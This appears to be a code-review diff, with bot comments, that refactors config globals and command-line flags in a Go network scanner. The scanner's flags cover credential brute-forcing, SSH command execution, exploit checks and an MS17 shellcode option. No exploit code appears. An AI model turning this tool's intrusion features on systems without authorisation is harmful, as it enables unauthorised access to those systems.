fmt.Println("-m ", Info.Scantype, " start scan the port:", Info.Ports)
fmt.Println("-m ", Scantype, " start scan the port:", Info.Ports)
}
}
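Review bot: In `ParseUser`, `Userdict[name] = Usernames` assigns the same slice header to every key, so all entries share one backing array; the later `Userdict[a] = append(Userdict[a], user...)` in ParseInput then appends into that shared spare capacity for each key in turn, which only works because the identical `user...` is written every time. This aliasing was carried over from the old `Info.Usernames` code, but copying per key, `Userdict[name] = append([]string(nil), Usernames...)`, removes it so a future per-service edit cannot clobber its neighbours. The ParseInput hunk begins and ends mid-function.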


@ -45,28 +45,15 @@ var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,
var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"
type HostInfo struct {
Host string
Ports string
Domain string
Url string
Path string
Timeout int64
Scantype string
Command string
SshKey string
Username string
Password string
Usernames []string
Passwords []string
Infostr []string
Hash string
Host string
Ports string
Url string
Infostr []string
}
type PocInfo struct {
Num int
Rate int
Timeout int64
Proxy string
PocName string
PocDir string
Target string
@ -79,10 +66,19 @@ type PocInfo struct {
}
var (
Path string
Scantype string
Command string
SshKey string
Domain string
Username string
Password string
Proxy string
Timeout int64
WebTimeout int64
TmpOutputfile string
TmpSave bool
IsPing bool
IsWmi bool
Ping bool
Pocinfo PocInfo
IsWebCan bool
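Review bot: The new package-level `Timeout` and `WebTimeout` carry no unit, yet every caller multiplies them by `time.Second` and the flag defaults are 3 and 5, so they are seconds — document that at the declaration: `Timeout int64 // per-connection timeout in seconds (-time)` and `WebTimeout int64 // web/POC HTTP client timeout in seconds (-wt)`. The same block now exposes `Password`, `SshKey` and `Command` as exported mutable globals read by the scan functions; a comment recording that they are written only during flag parsing and read-only afterwards captures the invariant that makes that safe without locking. `Password` in particular now lives for the whole process rather than in a per-target struct, which is fine for a CLI tool but worth stating.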


@ -25,14 +25,14 @@ func Flag(Info *HostInfo) {
flag.StringVar(&UserAdd, "usera", "", "add a user base DefaultUsers,-usera user")
flag.StringVar(&PassAdd, "pwda", "", "add a password base DefaultPasses,-pwda password")
flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445")
flag.StringVar(&Info.Command, "c", "", "exec command (ssh)")
flag.StringVar(&Info.SshKey, "sshkey", "", "sshkey file (id_rsa)")
flag.StringVar(&Info.Domain, "domain", "", "smb domain")
flag.StringVar(&Info.Username, "user", "", "username")
flag.StringVar(&Info.Password, "pwd", "", "password")
flag.Int64Var(&Info.Timeout, "time", 3, "Set timeout")
flag.StringVar(&Info.Scantype, "m", "all", "Select scan type ,as: -m ssh")
flag.StringVar(&Info.Path, "path", "", "fcgi、smb romote file path")
flag.StringVar(&Command, "c", "", "exec command (ssh)")
flag.StringVar(&SshKey, "sshkey", "", "sshkey file (id_rsa)")
flag.StringVar(&Domain, "domain", "", "smb domain")
flag.StringVar(&Username, "user", "", "username")
flag.StringVar(&Password, "pwd", "", "password")
flag.Int64Var(&Timeout, "time", 3, "Set timeout")
flag.StringVar(&Scantype, "m", "all", "Select scan type ,as: -m ssh")
flag.StringVar(&Path, "path", "", "fcgi、smb romote file path")
flag.IntVar(&Threads, "t", 600, "Thread nums")
flag.IntVar(&LiveTop, "top", 10, "show live len top")
flag.StringVar(&HostFile, "hf", "", "host file, -hf ip.txt")
@ -55,10 +55,10 @@ func Flag(Info *HostInfo) {
flag.StringVar(&URL, "u", "", "url")
flag.StringVar(&UrlFile, "uf", "", "urlfile")
flag.StringVar(&Pocinfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic")
flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
flag.StringVar(&Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
flag.Int64Var(&Pocinfo.Timeout, "wt", 5, "Set web timeout")
flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
flag.IntVar(&Pocinfo.Num, "num", 20, "poc rate")
flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
flag.Parse()
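Review bot: The help text for the two timeout flags, `"Set timeout"` and `"Set web timeout"`, gives no unit even though both values are multiplied by `time.Second` in the scanners; `flag.Int64Var(&Timeout, "time", 3, "Set timeout in seconds")` and `flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout in seconds")` remove the guesswork. Also, `-pwd` places the credential in argv, where it is visible in process listings and shell history; since a password file (`Passfile`) is already supported elsewhere in the package, the help text could point users to it for anything sensitive. Flag's body continues outside the two hunks shown.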